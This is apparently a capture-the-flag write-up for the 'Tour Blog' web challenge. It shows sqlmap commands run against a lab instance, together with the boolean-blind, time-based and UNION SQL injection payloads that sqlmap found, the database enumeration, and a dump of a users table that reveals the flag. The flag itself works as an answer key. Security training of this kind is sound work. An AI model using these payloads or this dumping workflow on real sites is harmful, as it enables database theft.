# Tour Blog

## CHALLENGE INFO

Your friend likes to travel a lot and recently he started to prepare a blog about the places he visited. He has asked you to check it out and make sure it's secure!

## Challange download and instructions

[web_tour_blog](web_tour_blog.zip)

To run challange you need some linux with docker

- unzip file
- run ./build-docker.sh

## Solve

I am lazy... so...

<details>
<summary>Click this to collapse/fold.</summary>

**sqlmap** to the rescue :smiling_imp:

```bash
# sqlmap -u http://104.248.169.123:31047/posts/1*

sqlmap identified the following injection point(s) with a total of 75 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://104.248.169.123:31047/posts/1' AND 5278=5278 AND 'SflD'='SflD

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://104.248.169.123:31047/posts/1' AND (SELECT 7464 FROM (SELECT(SLEEP(5)))HMvL) AND 'WfaV'='WfaV

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: http://104.248.169.123:31047/posts/-6755' UNION ALL SELECT NULL,NULL,CONCAT(0x71766a7671,0x68715a624276544955626a6b494b4f75424b6e71586d43646771567849794e4b704456656563546e,0x7178717071),NULL-- -
---
[23:46:19] [INFO] the back-end DBMS is MySQL
```

```bash
# sqlmap -u http://104.248.169.123:31047/posts/1* --current-db

[23:49:50] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[23:49:50] [INFO] fetching current database
current database: 'tourdb'
```

```bash
# sqlmap -u http://104.248.169.123:31047/posts/1* -D tourdb -T users --dump

Database: tourdb
Table: users
[1 entry]
+----+------------------------------+------------+
| id | password                     | username   |
+----+------------------------------+------------+
| 1  | HTB{5qlI_th3_3vergr33n_vu1N} | flagbearer |
+----+------------------------------+------------+
```

</details>

## Flag

HTB{5qlI_th3_3vergr33n_vu1N}
